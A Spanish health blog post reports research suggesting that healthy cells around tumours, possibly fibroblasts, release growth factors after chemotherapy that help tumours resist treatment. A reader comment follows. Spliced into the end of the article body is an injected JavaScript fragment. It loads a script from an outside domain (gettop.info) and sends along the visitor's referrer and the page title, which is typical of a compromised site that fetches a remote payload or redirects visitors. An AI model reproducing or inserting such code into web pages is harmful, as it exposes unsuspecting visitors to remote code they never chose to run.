Salud y belleza » Enfermedades, Medicina, Salud

La quimioterapia no siempre es efectiva

1 Comentario

quimioterapia-investigacionLa quimioterapia es un tratamiento estándar que se usa para eliminar muchos tumores malignos. Sin embargo, no es efectiva en el 100% de los casos y los investigadores intentan encontrar el motivo de la resistencia del tumor a la quimioterapia.

Pues bien, hace unos años científicos españoles descubrieron que había células sanas que podían emitir ciertos factores de crecimiento que ayudan al tumor a persistir. Siguiendo con la misma línea de investigación la revista Nature Medicine ha publicado nuevos resultados descubiertos por investigadores del centro Hutchinson del cáncer (Washington). La clave de esos resultados podría ser que la resistencia del tumor a la quimioterapia no solo se deba a las células malignas, sino también al resto de células sanas que las rodean. Los investigadores han demostrado que esas células “sanas” pueden ayudar al tumor a ser más sólido con el paso del tiempo, por lo que los tratamientos no siempre resultan efectivos.

quimio-El tratamiento de la quimioterapia se suele aplicar por ciclos puesto que afecta también a las células sanas. Para los expertos ahí podría estar la clave de la recaída y de por qué el tumor se hace inmune. Las células sanas, al recibir la quimioterapia, segregan una serie de factores de crecimiento 30 veces mayor de lo normal que pueden llegar a aliarse con los tumores. Estás células podrían ser los fibroblastos.

Gracias a estos hallazgos cada vez estamos más cerca de descubrir por qué falla la quimioterapia y de crear mejores tratamientos y más efectivos contra los tumores.

¿Te han dado alguna vez quimioterapia? ¿Has tenido problemas después?d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

One Comment »

  • Sheylla said:

    Tengo una amiga que tiene cáncer. Creo que de colon. Ha estado mucho tiempo con quimioterapia y ahora lo tiene peor que cuando empezó con el tratamiento. ¿Puede pasar?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.